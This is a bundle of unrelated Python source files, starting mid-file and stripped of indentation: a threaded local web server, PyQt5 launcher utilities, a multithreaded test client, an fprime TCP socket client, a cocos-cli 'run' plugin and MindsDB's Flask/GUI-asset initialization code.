def send_chunk(self, string):
hex_length = hex(len(string))[2:]
self.wfile.write('%s \r\n' % hex_length)
self.wfile.flush()
self.wfile.write(string)
self.wfile.write('\r\n')
self.wfile.flush()
def index_file(self):
base = os.path.split(__file__)[0]
filename = os.path.join(base, "realtime_test.html")
with open(filename, "r") as file:
contents = file.read()
return contents, 'text/html'
def javascript_file(self, path):
base = os.path.split(__file__)[0]
filename = os.path.join(base, path)
if not os.path.exists(path):
return '', 'text/javascript'
with open(filename, "r") as file:
contents = file.read()
return contents, 'text/javascript'
def log_message(self, format, *args):
pass
#sys.stderr.write("%s - - [%s] %s\n" %
# (self.address_string(),
# self.log_date_time_string(),
# format%args))
def do_stop(self):
thread = threading.Thread(target=self.server.stop)
thread.daemon = True;
thread.start()
return 'null', 'text/javascript'
def do_events(self):
new_events = self.server.get_all_events_since_previous_query()
string = json.dumps(new_events)
content_type = 'text/javascript'
return string, content_type
def do_open_file(self):
parameters = urlparse.parse_qs(self.parsed_path.query)
path = parameters['path'][0]
lineno = int(parameters['lineno'][0])
open_file(path, lineno)
string = 'null'
content_type = 'text/javascript'
return string, content_type
class WebServer(socketserver.ThreadingMixIn, HTTPServer):
def __init__(self, port, request_handler):
HTTPServer.__init__(self, ('', port), request_handler)
self.daemon_threads = True
self.events_queue = queue.Queue()
def start(self):
self.serve_forever()
def stop(self):
self.shutdown()
def get_all_events_since_previous_query(self):
try:
events = []
while True:
events.append(self.events_queue.get(False))
except queue.Empty:
pass
return events
|
pkg.py
|
#!/usr/bin/python3
import os
import sys
import json
import subprocess
from glob import glob
from threading import Thread
from PyQt5.QtCore import QFileInfo, QPointF, QSize, QUrl, Qt, QRect
from PyQt5.QtGui import QColor, QDesktopServices, QFont, QImage, QIcon, QBrush, QPixmap, QPainter, QWindow
from PyQt5.QtWidgets import QFileIconProvider, QGraphicsDropShadowEffect, QListWidgetItem
base_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), "")
user_home_dirs = [
"~/Downloads/",
"~/Documents/",
"~/Desktop/",
"~/Videos/",
"~/Pictures/",
"~/Music/"]
## return os.path
def icon_path(_file: str, icon: bool=False):
if icon:
return QIcon(base_dir + "icons/" + _file)
else:
return base_dir + "icons/" + _file
def ui_path(_file: str):
return base_dir + "ui/" + _file
def style_path(_file: str):
return base_dir + "styles/" + _file
# function to alter image
def mask_image(imgdata, img_size: tuple=(100, 100), size: int=64):
imgtype = os.path.splitext(os.path.split(imgdata)[1])[1]
# Load image
image = QImage.fromData(open(imgdata, "rb").read(), imgtype)
# convert image to 32-bit ARGB (adds an alpha
# channel ie transparency factor):
image.convertToFormat(QImage.Format_ARGB32)
# Crop image to a square:
imgsize = min(image.width(), image.height())
rect = QRect(
(image.width() - imgsize) // 2,
(image.height() - imgsize) // 2,
imgsize,
imgsize)
image = image.copy(rect)
# Create the output image with the same dimensions
# and an alpha channel and make it completely transparent:
out_img = QImage(imgsize, imgsize, QImage.Format_ARGB32)
out_img.fill(Qt.transparent)
# Create a texture brush and paint a circle
# with the original image onto the output image:
brush = QBrush(image)
# Paint the output image
painter = QPainter(out_img)
painter.setBrush(brush)
# Don't draw an outline
painter.setPen(Qt.NoPen)
# drawing circle
painter.drawEllipse(0, 0, imgsize, imgsize)
# closing painter event
painter.end()
# Convert the image to a pixmap and rescale it.
pr = QWindow().devicePixelRatio()
pm = QPixmap.fromImage(out_img)
pm.setDevicePixelRatio(pr)
size *= pr
pm = pm.scaled(img_size[0], img_size[1], Qt.KeepAspectRatio,
Qt.SmoothTransformation)
# return back the pixmap data
return pm
def add_item(obj, icon: QIcon, text: str="", tooltip: str="", selectable: bool=False,
select: bool=False, checkable: bool=False, check: bool=False, hide: bool=False,
font_size: int=10, icon_size=(25, 25), enabled: bool=True, dis_bg: str="#efeeef",
alignment=None, icon_theme: bool=False, icon_provider: bool=False):
font = QFont()
font.setPixelSize(font_size)
att = QListWidgetItem()
att.setText(text)
att.setHidden(hide)
att.setFont(font)
if icon and isinstance(icon, str):
if icon_provider:
icon = icon_types(icon)
elif icon_theme:
icon = QIcon.fromTheme(icon)
else:
icon = QIcon(icon)
att.setIcon(icon)
else:
att.setIcon(icon)
if tooltip:
att.setToolTip(tooltip)
if checkable:
att.setCheckState(check)
if selectable:
att.setSelected(select)
obj.setIconSize(QSize(icon_size[0], icon_size[1]))
if not enabled:
att.setFlags(Qt.NoItemFlags)
att.setBackground(QColor(dis_bg))
if not alignment == None:
att.setTextAlignment(alignment)
return att
def get_line(obj):
text = str(obj.text()).strip()
try:
ext = text.split(":")
suffix = ""
for i in ext[1:]:
suffix += " " + i
if len(ext) >= 2:
return ext[0], suffix.strip()
except IndexError:
return None
def icon_types(_file: str, is_file: list=[False, ""]):
file_type = os.path.splitext(os.path.split(_file)[1])[1].strip(".")
## set image/video icon
if file_type in json.load(open(base_dir + "api/icons.json")).get("Image"):
if not is_file[0]:
return QIcon(_file)
else:
return _file
## Default System Icons
else:
fileInfo = QFileInfo(_file)
iconProvider = QFileIconProvider()
icon = iconProvider.icon(fileInfo)
if not is_file[0]:
return icon
else:
iconProvider.icon(fileInfo).pixmap(200, 200).save(is_file[1], "png")
return is_file[1]
def api_icons(_type: str, default: list=[]):
try:
return json.load(open(base_dir + "api/icons.json")).get(_type, default)
except KeyError:
return ""
def Import(_file: str):
try:
import importlib
spec = importlib.util.spec_from_file_location(
os.path.split(_file)[0].split(".")[0], _file)
foo = importlib.util.module_from_spec(spec)
spec.loader.exec_module(foo)
except Exception:
import imp
foo = imp.load_package(os.path.split(_file)[0].split(".")[0], _file)
return foo
def set_image(_file: str, icon: bool=False, size: int=150):
if icon:
return _file.pixmap(QSize(size, size))
else:
return QIcon(_file).pixmap(QSize(size, size))
def add_item_widget(item, item_widget, text: str="",
subtitle: str="", hotkey: str="",
no_subtitle: bool=False, item_size=(250, 40)):
frame = item_widget
frame.title.setText(text)
frame.hotkey.setText(hotkey)
if no_subtitle:
frame.subtitle.hide()
frame.subtitle.setStyleSheet("")
else:
frame.subtitle.show()
frame.subtitle.setText(subtitle)
item.setSizeHint(QSize(item_size[0], item_size[1]))
return (item, frame)
def get_sys_icon(_name: str):
_icon = QIcon.fromTheme(_name)
return _icon
def _ext_json(_path: str, key: str, value: str=""):
return json.load(open(str(_path + "package.json"))).get(key.lower(), value)
def set_item_widget(obj, item):
obj.addItem(item[0])
obj.setItemWidget(item[0], item[1])
def set_item(obj, item):
obj.addItem(item)
def run_app(cmd: object):
Thread(target=lambda: subprocess.call(cmd, shell=True, stderr=None, stdin=None, stdout=None), daemon=True).start()
def get_size(bytes, suffix="B"):
"""
Scale bytes to its proper format
e.g:
1253656 => '1.20MB'
1253656678 => '1.17GB'
"""
factor = 1024
for unit in ["", "K", "M", "G", "T", "P"]:
if bytes < factor:
return f"{bytes:.2f} {unit}{suffix}"
bytes /= factor
try:
import vlc
class video_player:
def __init__(self, frame, file: str="", on_changed: object=None):
self.frame = frame
self.file = file
self.on_changed = on_changed
self.__instance = vlc.Instance()
self.__mediaplayer = self.__instance.media_player_new()
if self.on_changed:
self.__vlc_event_manager = self.__mediaplayer.event_manager()
self.__vlc_event_manager.event_attach(vlc.EventType.MediaPlayerTimeChanged, self.on_changed)
if sys.platform.startswith("linux"):
self.__mediaplayer.set_xwindow(self.frame.winId())
elif sys.platform == "win32":
self.__mediaplayer.set_hwnd(self.frame.winId())
elif sys.platform == "darwin":
self.__mediaplayer.set_nsobject(self.frame.winId())
if self.file:
media = self.__instance.media_new(self.file)
self.__mediaplayer.set_media(media)
@property
def media(self):
return self.__mediaplayer
@property
def instance(self):
return self.__instance
def set_media(self, file):
media = self.__instance.media_new(file)
self.__mediaplayer.set_media(media)
except (ImportError, ImportWarning, ModuleNotFoundError):
pass
def set_box_shadow(blur: int = 5, point: tuple = (5, 5), color: str = "black"):
# creating a QGraphicsDropShadowEffect object
shadow = QGraphicsDropShadowEffect()
# setting blur radius (optional step)
shadow.setBlurRadius(blur)
## set shadow possation
shadow.setOffset(QPointF(point[0], point[1]))
## set a property option
shadow.setProperty("color", color)
return shadow
def find_in_all(query: str, path: str="~/"):
result = {}
paths = glob(os.path.expanduser(path) + "*")
if query.strip():
for dn in paths:
if os.path.isdir(dn):
paths.extend(glob(dn + "/*"))
result.update({os.path.split(dn)[1]: dn})
elif query.strip() in dn.strip():
result.update({os.path.split(dn)[1]: dn})
return result
def find_in(query: str, path: object="~/"):
result = {}
if query.strip() and isinstance(path, str):
for i in glob(os.path.expanduser(os.path.expandvars(path)) + "*"):
if query in i:
result.update({os.path.splitext(os.path.split(i)[1])[0]: i})
elif query.strip() and isinstance(path, list) or isinstance(path, tuple):
for i in path:
for j in glob(os.path.expanduser(os.path.expandvars(i)) + "*"):
if query in j:
result.update({os.path.splitext(os.path.split(j)[1])[0]: j})
return result
def get_split_file(_file):
return (
os.path.dirname(_file),
os.path.splitext(os.path.basename(_file))[0],
os.path.splitext(os.path.basename(_file))[1]
)
def get_platform():
if sys.platform.startswith(("linux")):
platform = "linux"
elif sys.platform.startswith("win"):
platform = "windows"
elif sys.platform.startswith("darw"):
platform = "macos"
else:
platform = "all"
return platform
def get_system_name():
if sys.platform.startswith(("linux")):
platform = "Linux"
elif sys.platform.startswith("win"):
platform = "Windows"
elif sys.platform.startswith("darw"):
platform = "MacOS"
else:
platform = "UnKnow"
return platform
def open_url(_file: str):
QDesktopServices.openUrl(QUrl.fromUserInput(_file))
def cmd_open_url(_file: str):
run_app("xdg-open '%s'" % _file)
def run_thread(func: object, *args, **kwargs):
Thread(target=func, daemon=True, args=args, kwargs=kwargs).start()
def get_cmd_output(*args):
t = ""
for i in args:
t += i + " "
return os.popen(t, "r")
|
client-multithread.py
|
import requests
import random
import threading
import sys
HOST, PORT = "localhost", 9999
data_url = "http://localhost:3000/test_data/file"
max_file_count = 9
max_file_name = 9
nthreads = int(sys.argv[1])
def client_method():
fnames = ''
nfiles = random.randrange(0, max_file_count)
for i in range(nfiles):
fname = data_url + str(random.randrange(1, max_file_name + 1))
if i != 0:
fnames += ','
fnames += fname
print(fnames)
r = requests.post("http://{}:{}".format(HOST, PORT), data = fnames, headers={"Content-Length" : str(len(fnames)) } )
print(r.text)
# Make threads doing this.
for i in range(nthreads):
th = threading.Thread(target=client_method)
th.daemon = False
th.start()
|
client_socket.py
|
"""
client_socket.py:
Socket used to attach to the TCP server as a client and read/write data.
"""
import select
import socket
import threading
from fprime.constants import DATA_ENCODING
from fprime_gds.common.handlers import DataHandler
# Constants for public use
GUI_TAG = "GUI"
FSW_TAG = "FSW"
class ThreadedTCPSocketClient(DataHandler):
"""
Threaded TCP client that connects to the socket server that serves packets from the flight
software
"""
def __init__(self, sock=None, dest=FSW_TAG):
"""
Threaded client socket constructor
Keyword Arguments:
sock {Socket} -- A socket for the client to use. Created own if
None (default: {None})
"""
if sock is None:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
self.sock = sock
# NOTE can't do this b/c EINPROGRESS: self.sock.setblocking(0)
self.dest = dest
self.__distributors = []
self.__select_timeout = 1
self.__data_recv_thread = threading.Thread(target=self.recv)
self.stop_event = threading.Event()
def get_data_bytes(self, string_data):
"""
Convert the data bytes from string to bytes
:param string_data: data in string format
:return: data in bytes format
"""
return string_data.encode(DATA_ENCODING)
def get_data_string(self, bytes_data):
"""
Convert the data bytes from string to bytes
:param bytes_data: data in bytes format
:return: data in string format
"""
return bytes_data.decode(DATA_ENCODING)
def register_distributor(self, distributor):
"""Registers a fprime.gds.distributor object with this socket
Arguments:
fprime.gds.distributor {Distributor} -- Distributor must implement data_callback
"""
self.__distributors.append(distributor)
def register_to_server(self, register_as):
"""
Registers the caller to the server as type register_as
This function assumes the socket connects to an fprime TCP server
Args:
register_as (string): How to identify this process to the TCP server
Can be either "FSW" or "GUI"
"""
data = "Register %s\n" % register_as
self.sock.send(self.get_data_bytes(data))
def connect(self, host, port):
"""Connect to host at given port and start the threaded recv method.
Arguments:
host {string} -- IP of the host server
port {int} -- Port of the host server
"""
try:
self.sock.connect((host, port))
self.__data_recv_thread.start()
except OSError:
print("There was a problem connecting to the TCP Server")
exit(-1)
def disconnect(self):
"""Disconnect the socket client from the server and stop the internal thread.
"""
self.stop_event.set()
self.__data_recv_thread.join()
self.sock.close()
def data_callback(self, data, sender=None):
"""
Handles incoming data by sending it to a socket.
:param data: data to send to the client socket
:param sender: sender source of the data
"""
self.send(data, self.dest)
def send(self, data, dest):
"""
Send data to the server
All necessary headers are added in this function.
Arguments:
data {binary} -- The data to send (What you want the destination
to receive)
dest {String} -- Where to send the data to. Either "FSW" or "GUI"
"""
self.sock.send(b"A5A5 %s %s" % (self.get_data_bytes(dest), data))
def recv(self):
"""
Method run constantly by the enclosing thread. Looks for data from the server.
"""
while not self.stop_event.is_set():
ready = select.select([self.sock], [], [], self.__select_timeout)
if ready[0]:
chunk = self.sock.recv(1024)
for d in self.__distributors:
d.on_recv(chunk)
|
project_run.py
|
#!/usr/bin/python
# ----------------------------------------------------------------------------
# cocos "install" plugin
#
# Authr: Luis Parravicini
#
# License: MIT
# ----------------------------------------------------------------------------
'''
"run" plugin for cocos command line tool
'''
__docformat__ = 'restructuredtext'
import sys
import os
import cocos
from MultiLanguage import MultiLanguage
import webbrowser
import threading
import subprocess
import re
if(sys.version_info.major >= 3):
from http.server import BaseHTTPRequestHandler,HTTPServer
else:
import BaseHTTPServer
class CCPluginRun(cocos.CCPlugin):
"""
Compiles a project and runs it on the target
"""
@staticmethod
def depends_on():
return ('deploy',)
@staticmethod
def plugin_name():
return "run"
@staticmethod
def brief_description():
return MultiLanguage.get_string('RUN_BRIEF')
def _add_custom_options(self, parser):
parser.add_argument("-m", "--mode", dest="mode", default='debug',
help=MultiLanguage.get_string('RUN_ARG_MODE'))
group = parser.add_argument_group(MultiLanguage.get_string('RUN_ARG_GROUP_WEB'))
group.add_argument("-b", "--browser", dest="browser",
help=MultiLanguage.get_string('RUN_ARG_BROWSER'))
group.add_argument("--param", dest="param",
help=MultiLanguage.get_string('RUN_ARG_PARAM'))
group.add_argument("--port", dest="port", metavar="SERVER_PORT", nargs='?',
help=MultiLanguage.get_string('RUN_ARG_PORT'))
group.add_argument("--host", dest="host", metavar="SERVER_HOST", nargs='?', default='127.0.0.1',
help=MultiLanguage.get_string('RUN_ARG_HOST'))
group.add_argument("--no-console", action="store_true", dest="no_console", default=False,
help=MultiLanguage.get_string('RUN_ARG_NO_CONSOLE'))
group.add_argument("--working-dir", dest="working_dir", default='',
help=MultiLanguage.get_string('RUN_ARG_WORKING_DIR'))
group = parser.add_argument_group(MultiLanguage.get_string('RUN_ARG_GROUP_IOS'))
group.add_argument("-sdk", dest="use_sdk", metavar="USE_SDK", nargs='?', default='iphonesimulator',
help=MultiLanguage.get_string('RUN_ARG_IOS_SDK'))
def _check_custom_options(self, args):
self._port = args.port
self._mode = args.mode
self._host = args.host
self._browser = args.browser
self._param = args.param
self._no_console = args.no_console
self._working_dir = args.working_dir
def get_ios_sim_name(self):
# get the version of xcodebuild
ver = cocos.get_xcode_version()
match = re.match(r'(\d+).*', ver)
ret = None
if match:
ver_num = int(match.group(1))
if ver_num <= 5:
ret = "ios-sim-xcode5"
elif ver_num < 8:
ret = "ios-sim-xcode6"
return ret
def _get_cmd_output(self, cmds):
child = subprocess.Popen(cmds, stdout=subprocess.PIPE)
out = child.stdout.read()
child.wait()
errCode = child.returncode
return (errCode, out)
def _get_simulator_id(self):
(errCode, out) = self._get_cmd_output([ "xcrun", "instruments", "-s" ])
names = []
if errCode == 0:
pattern = r'(^iPhone[^\[]+)\[(.*)\]\s*\(Simulator\)'
lines = out.split('\n')
for line in lines:
match = re.match(pattern, line)
if match:
info = {
"name" : match.group(1),
'id' : match.group(2)
}
names.append(info)
ret = None
retName = None
phoneTypeNum = 0
phoneType = ''
iosVer = 0
if len(names) > 0:
name_pattern = r'iPhone\s+((\d+)[^\(]+)\((.*)\)'
for info in names:
name = info["name"]
id = info["id"]
if name.find('Apple Watch') > 0:
continue
match = re.match(name_pattern, name)
if match:
# get the matched data
typeNum = int(match.group(2))
tmpType = match.group(1)
tmpIOSVer = match.group(3)
if ((typeNum > phoneTypeNum) or
(typeNum == phoneTypeNum and tmpType > phoneType) or
(typeNum == phoneTypeNum and tmpType == phoneType and cocos.version_compare(tmpIOSVer, '>', iosVer))):
# find the max phone type number first
ret = id
retName = name.strip()
phoneTypeNum = typeNum
phoneType = tmpType
iosVer = tmpIOSVer
if ret is None:
raise cocos.CCPluginError('Get simulator failed!')
print('Using simulator: %s' % retName)
return ret
def _get_bundle_id(self, app_path):
plistFile = os.path.join(app_path, 'Info.plist')
(errCode, out) = self._get_cmd_output([ 'plutil', '-convert', 'json', '-o', '-', plistFile ])
ret = None
if errCode == 0:
import json
jsonObj = json.loads(out)
if jsonObj is not None and jsonObj.has_key('CFBundleIdentifier'):
ret = jsonObj['CFBundleIdentifier']
if ret is None:
raise cocos.CCPluginError('Get the bundle ID of app %s failed' % app_path)
return ret
def _run_ios_app(self, ios_app_path):
if not cocos.os_is_mac():
raise cocos.CCPluginError('Now only support run iOS simulator on Mac OS')
# get bundle id
bundle_id = self._get_bundle_id(ios_app_path)
# find simulator
simulator_id = self._get_simulator_id()
try:
# run the simulator
xcode_version = cocos.get_xcode_version()
xcode9_and_upper = cocos.version_compare(xcode_version,">=",9)
if xcode9_and_upper:
self._run_cmd('xcrun simctl boot "%s"' % simulator_id)
self._run_cmd('open `xcode-select -p`/Applications/Simulator.app')
else:
self._run_cmd('xcrun instruments -w "%s"' % simulator_id)
except Exception as e:
pass
# install app
self._run_cmd('xcrun simctl install "%s" "%s"' % (simulator_id, ios_app_path))
# run app
self._run_cmd('xcrun simctl launch "%s" "%s"' % (simulator_id, bundle_id))
def run_ios_sim(self, dependencies):
if not self._platforms.is_ios_active():
return
deploy_dep = dependencies['deploy']
if deploy_dep._use_sdk == 'iphoneos':
cocos.Logging.warning(MultiLanguage.get_string('RUN_WARNING_IOS_FOR_DEVICE_FMT',
os.path.dirname(deploy_dep._iosapp_path)))
else:
ios_sim_name = self.get_ios_sim_name()
if ios_sim_name is None:
# there is not a ios-sim for current installed xcode
# try to use xcrun commands
self._run_ios_app(deploy_dep._iosapp_path)
else:
if getattr(sys, 'frozen', None):
cur_dir = os.path.realpath(os.path.dirname(sys.executable))
else:
cur_dir = os.path.realpath(os.path.dirname(__file__))
iossim_exe_path = os.path.join(cur_dir, 'bin', ios_sim_name)
launch_sim = "%s launch \"%s\" &" % (iossim_exe_path, deploy_dep._iosapp_path)
self._run_cmd(launch_sim)
def run_ios_device(self):
if not self._platforms.is_ios_active():
return
cocos.Logging.warning('Do not support running on iOS devices.')
def _run_with_desktop_options(self, cmd):
if self._no_console:
cmd += ' -console no'
if self._working_dir:
cmd += ' -workdir "%s"' % self._working_dir
self._run_cmd(cmd)
def run_mac(self, dependencies):
if not self._platforms.is_mac_active():
return
deploy_dep = dependencies['deploy']
launch_macapp = '\"%s/Contents/MacOS/%s\"' % (deploy_dep._macapp_path, deploy_dep.target_name)
self._run_with_desktop_options(launch_macapp)
def run_android_device(self, dependencies):
if not self._platforms.is_android_active():
return
sdk_root = cocos.check_environment_variable('ANDROID_SDK_ROOT')
adb_path = cocos.CMDRunner.convert_path_to_cmd(os.path.join(sdk_root, 'platform-tools', 'adb'))
deploy_dep = dependencies['deploy']
startapp = "%s shell am start -n \"%s/%s\"" % (adb_path, deploy_dep.package, deploy_dep.activity)
self._run_cmd(startapp)
pass
def open_webbrowser(self, url):
if self._browser is None:
threading.Event().wait(1)
webbrowser.open_new(url)
else:
if cocos.os_is_mac():
if self._param is None:
url_cmd = "open -a \"%s\" \"%s\"" % (self._browser, url)
else:
url_cmd = "\"%s\" \"%s\" %s" % (self._browser, url, self._param)
else:
if self._param is None:
url_cmd = "\"%s\" %s" % (self._browser, url)
else:
url_cmd = "\"%s\" \"%s\" %s" % (self._browser, url, self._param)
self._run_cmd(url_cmd)
def run_web(self, dependencies):
if not self._platforms.is_web_active():
return
from SimpleHTTPServer import SimpleHTTPRequestHandler
HandlerClass = SimpleHTTPRequestHandler
if(sys.version_info.major >= 3):
ServerClass = HTTPServer.HTTPServer
else:
ServerClass = BaseHTTPServer.BaseHTTPServer
Protocol = "HTTP/1.0"
HandlerClass.protocol_version = Protocol
host = self._host
if self._port is None:
port = 8000
port_max_add = 2000
else:
port = int(self._port)
port_max_add = 0
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
i = 0
httpd = None
while (i <= port_max_add):
port += i
i += 1
server_address = (host, port)
try:
cocos.Logging.info(MultiLanguage.get_string('RUN_INFO_HOST_PORT_FMT', (host, port)))
httpd = ServerClass(server_address, HandlerClass)
except Exception as e:
httpd = None
cocos.Logging.warning(MultiLanguage.get_string('RUN_WARNING_SERVER_FAILED_FMT', (host, port, e)))
if httpd is not None:
break
if httpd is None:
raise cocos.CCPluginError(MultiLanguage.get_string('RUN_ERROR_START_SERVER_FAILED'),
cocos.CCPluginError.ERROR_OTHERS)
from threading import Thread
sub_url = deploy_dep.sub_url
url = 'http://%s:%s%s' % (host, port, sub_url)
thread = Thread(target = self.open_webbrowser, args = (url,))
thread.start()
sa = httpd.socket.getsockname()
with cocos.pushd(run_root):
cocos.Logging.info(MultiLanguage.get_string('RUN_INFO_SERVING_FMT', (sa[0], sa[1])))
httpd.serve_forever()
def run_win32(self, dependencies):
if not self._platforms.is_win32_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_with_desktop_options(os.path.join(run_root, exe))
def run_linux(self, dependencies):
if not self._platforms.is_linux_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_with_desktop_options(os.path.join(run_root, exe))
def run_tizen(self, dependencies):
if not self._platforms.is_tizen_active():
return
deploy_dep = dependencies['deploy']
tizen_packageid = deploy_dep.tizen_packageid
tizen_studio_path = cocos.check_environment_variable("TIZEN_STUDIO_HOME")
tizen_cmd_path = cocos.CMDRunner.convert_path_to_cmd(os.path.join(tizen_studio_path, "tools", "ide", "bin", "tizen"))
startapp = "%s run -p %s" % (tizen_cmd_path, tizen_packageid)
self._run_cmd(startapp)
def run(self, argv, dependencies):
self.parse_args(argv)
cocos.Logging.info(MultiLanguage.get_string('RUN_INFO_START_APP'))
self.run_android_device(dependencies)
self.run_ios_sim(dependencies)
# self.run_ios_device()
self.run_mac(dependencies)
self.run_web(dependencies)
self.run_win32(dependencies)
self.run_linux(dependencies)
|
initialize.py
|
from distutils.version import LooseVersion
import requests
import os
import shutil
import threading
import webbrowser
from zipfile import ZipFile
from pathlib import Path
import traceback
import tempfile
# import concurrent.futures
from flask import Flask, url_for, make_response
from flask.json import dumps
from flask_restx import Api
from mindsdb.__about__ import __version__ as mindsdb_version
from mindsdb.interfaces.datastore.datastore import DataStore
from mindsdb.interfaces.model.model_interface import ModelInterface
from mindsdb.interfaces.database.integrations import DatasourceController
from mindsdb.utilities.ps import is_pid_listen_port, wait_func_is_true
from mindsdb.utilities.telemetry import inject_telemetry_to_static
from mindsdb.utilities.config import Config
from mindsdb.utilities.log import get_log
from mindsdb.interfaces.storage.db import session
from mindsdb.utilities.json_encoder import CustomJSONEncoder
class Swagger_Api(Api):
"""
This is a modification of the base Flask Restplus Api class due to the issue described here
https://github.com/noirbizarre/flask-restplus/issues/223
"""
@property
def specs_url(self):
return url_for(self.endpoint("specs"), _external=False)
def custom_output_json(data, code, headers=None):
resp = make_response(dumps(data), code)
resp.headers.extend(headers or {})
return resp
def get_last_compatible_gui_version() -> LooseVersion:
log = get_log('http')
try:
res = requests.get('https://mindsdb-web-builds.s3.amazonaws.com/compatible-config.json', timeout=5)
except (ConnectionError, requests.exceptions.ConnectionError) as e:
print(f'Is no connection. {e}')
return False
except Exception as e:
print(f'Is something wrong with getting compatible-config.json: {e}')
return False
if res.status_code != 200:
print(f'Cant get compatible-config.json: returned status code = {res.status_code}')
return False
try:
versions = res.json()
except Exception as e:
print(f'Cant decode compatible-config.json: {e}')
return False
current_mindsdb_lv = LooseVersion(mindsdb_version)
try:
gui_versions = {}
max_mindsdb_lv = None
max_gui_lv = None
for el in versions['mindsdb']:
if el['mindsdb_version'] is None:
gui_lv = LooseVersion(el['gui_version'])
else:
mindsdb_lv = LooseVersion(el['mindsdb_version'])
gui_lv = LooseVersion(el['gui_version'])
if mindsdb_lv.vstring not in gui_versions or gui_lv > gui_versions[mindsdb_lv.vstring]:
gui_versions[mindsdb_lv.vstring] = gui_lv
if max_mindsdb_lv is None or max_mindsdb_lv < mindsdb_lv:
max_mindsdb_lv = mindsdb_lv
if max_gui_lv is None or max_gui_lv < gui_lv:
max_gui_lv = gui_lv
all_mindsdb_lv = [LooseVersion(x) for x in gui_versions.keys()]
all_mindsdb_lv.sort()
if current_mindsdb_lv.vstring in gui_versions:
gui_version_lv = gui_versions[current_mindsdb_lv.vstring]
elif current_mindsdb_lv > all_mindsdb_lv[-1]:
gui_version_lv = max_gui_lv
else:
lower_versions = {key: value for key, value in gui_versions.items() if LooseVersion(key) < current_mindsdb_lv}
if len(lower_versions) == 0:
gui_version_lv = gui_versions[all_mindsdb_lv[0].vstring]
else:
all_lower_versions = [LooseVersion(x) for x in lower_versions.keys()]
gui_version_lv = gui_versions[all_lower_versions[-1].vstring]
except Exception as e:
log.error(f'Error in compatible-config.json structure: {e}')
return False
return gui_version_lv
def get_current_gui_version() -> LooseVersion:
config = Config()
static_path = Path(config['paths']['static'])
version_txt_path = static_path.joinpath('version.txt')
current_gui_version = None
if version_txt_path.is_file():
with open(version_txt_path, 'rt') as f:
current_gui_version = f.readline()
current_gui_lv = None if current_gui_version is None else LooseVersion(current_gui_version)
return current_gui_lv
def download_gui(destignation, version):
if isinstance(destignation, str):
destignation = Path(destignation)
log = get_log('http')
css_zip_path = str(destignation.joinpath('css.zip'))
js_zip_path = str(destignation.joinpath('js.zip'))
media_zip_path = str(destignation.joinpath('media.zip'))
bucket = "https://mindsdb-web-builds.s3.amazonaws.com/"
resources = [{
'url': bucket + 'css-V' + version + '.zip',
'path': css_zip_path
}, {
'url': bucket + 'js-V' + version + '.zip',
'path': js_zip_path
}, {
'url': bucket + 'indexV' + version + '.html',
'path': str(destignation.joinpath('index.html'))
}, {
'url': bucket + 'favicon.ico',
'path': str(destignation.joinpath('favicon.ico'))
}, {
'url': bucket + 'media.zip',
'path': media_zip_path
}]
def get_resources(resource):
response = requests.get(resource['url'])
if response.status_code != requests.status_codes.codes.ok:
raise Exception(f"Error {response.status_code} GET {resource['url']}")
open(resource['path'], 'wb').write(response.content)
try:
for r in resources:
get_resources(r)
except Exception as e:
log.error(f'Error during downloading files from s3: {e}')
return False
for zip_path, dir_name in [[js_zip_path, 'js'], [css_zip_path, 'css']]:
temp_dir = destignation.joinpath(f'temp_{dir_name}')
temp_dir.mkdir(mode=0o777, exist_ok=True, parents=True)
ZipFile(zip_path).extractall(temp_dir)
files_path = destignation.joinpath('static', dir_name)
if temp_dir.joinpath('build', 'static', dir_name).is_dir():
shutil.move(temp_dir.joinpath('build', 'static', dir_name), files_path)
shutil.rmtree(temp_dir)
else:
shutil.move(temp_dir, files_path)
static_folder = Path(destignation).joinpath('static')
static_folder.mkdir(parents=True, exist_ok=True)
ZipFile(media_zip_path).extractall(static_folder)
os.remove(js_zip_path)
os.remove(css_zip_path)
os.remove(media_zip_path)
version_txt_path = destignation.joinpath('version.txt') # os.path.join(destignation, 'version.txt')
with open(version_txt_path, 'wt') as f:
f.write(version)
return True
'''
# to make downloading faster download each resource in a separate thread
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
future_to_url = {executor.submit(get_resources, r): r for r in resources}
for future in concurrent.futures.as_completed(future_to_url):
res = future.result()
if res is not None:
raise res
'''
def initialize_static():
success = update_static()
session.close()
return success
def update_static():
''' Update Scout files basing on compatible-config.json content.
Files will be downloaded and updated if new version of GUI > current.
Current GUI version stored in static/version.txt.
'''
config = Config()
log = get_log('http')
static_path = Path(config['paths']['static'])
last_gui_version_lv = get_last_compatible_gui_version()
current_gui_version_lv = get_current_gui_version()
if last_gui_version_lv is False:
return False
if current_gui_version_lv is not None:
if current_gui_version_lv >= last_gui_version_lv:
return True
log.info(f'New version of GUI available ({last_gui_version_lv.vstring}). Downloading...')
temp_dir = tempfile.mkdtemp(prefix='mindsdb_gui_files_')
success = download_gui(temp_dir, last_gui_version_lv.vstring)
if success is False:
shutil.rmtree(temp_dir)
return False
temp_dir_for_rm = tempfile.mkdtemp(prefix='mindsdb_gui_files_')
shutil.rmtree(temp_dir_for_rm)
shutil.copytree(str(static_path), temp_dir_for_rm)
shutil.rmtree(str(static_path))
shutil.copytree(temp_dir, str(static_path))
shutil.rmtree(temp_dir_for_rm)
log.info(f'GUI version updated to {last_gui_version_lv.vstring}')
return True
def initialize_flask(config, init_static_thread, no_studio):
# Apparently there's a bug that causes the static path not to work if it's '/' -- https://github.com/pallets/flask/issues/3134, I think '' should achieve the same thing (???)
if no_studio:
app = Flask(
__name__
)
else:
static_path = os.path.join(config['paths']['static'], 'static/')
if os.path.isabs(static_path) is False:
static_path = os.path.join(os.getcwd(), static_path)
app = Flask(
__name__,
static_url_path='/static',
static_folder=static_path
)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 60
app.config['SWAGGER_HOST'] = 'http://localhost:8000/mindsdb'
app.json_encoder = CustomJSONEncoder
authorizations = {
'apikey': {
'type': 'session',
'in': 'query',
'name': 'session'
}
}
api = Swagger_Api(
app,
authorizations=authorizations,
security=['apikey'],
url_prefix=':8000',
prefix='/api',
doc='/doc/'
)
